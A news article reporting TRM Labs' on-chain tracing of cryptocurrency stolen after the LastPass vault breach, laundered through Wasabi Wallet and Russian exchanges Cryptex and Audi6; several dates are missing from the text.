TRM identified Russian cybercriminal infrastructure at multiple points in the laundering pipeline linked to the LastPass breach. According to TRM, demixing techniques allowed analysts to link pre-and post-mix activity to the same actors, despite the use of mixers like Wasabi Wallet. Laundered Bitcoin (BTC) was found to have flowed through Russian exchanges Cryptex and Audi6. Cryptex was sanctioned in and Audi6 is associated with cybercriminal activity, with one of them receiving LastPass-linked funds as recently as .
The LastPass breach exposed backups of approximately 30 million customer vaults, impacting more than 25 million users globally, according to TRM. Attackers were able to download these encrypted containers, creating a long-term risk for vaults protected by weak master passwords. TRM estimates that over $28 million in cryptocurrency was stolen, converted to Bitcoin, and laundered through Wasabi Wallet in late and early . A subsequent wave identified in traced approximately $7 million in additional stolen funds through Wasabi Wallet, with withdrawals ultimately flowing to Audi6.
The ongoing wallet drains, occurring years after the initial breach, are attributed by TRM to users who failed to change or secure their master passwords, leaving their vaults vulnerable to offline decryption. TRM assesses that the activity is consistent with Russian cybercrime involvement due to repeated interaction with Russia-associated infrastructure, continuity of control across pre-and post-mix activity, and the consistent use of high-risk Russian exchanges as off-ramps. The firm notes that stolen funds were repeatedly laundered through infrastructure commonly associated with Russian cybercriminal ecosystems.
While TRM‘s analysis provides a clear on-chain view of asset movement, definitive attribution of the original LastPass intrusion cannot yet be confirmed. Specific details regarding user refunds or compensation for affected individuals have not been disclosed by LastPass or other entities.
This case highlights the operational resilience of cybercrime ecosystems and the diminishing effectiveness of mixing services as a reliable means of obfuscation, according to TRM. The findings underscore the continued role of Russia-based financial infrastructure as a systemic enabler of global cybercrime. Users impacted by the LastPass breach are advised to secure their accounts and change master passwords, as the threat of ongoing wallet drains persists.
Follow us on Bluesky , LinkedIn , and X to Get Instant Updates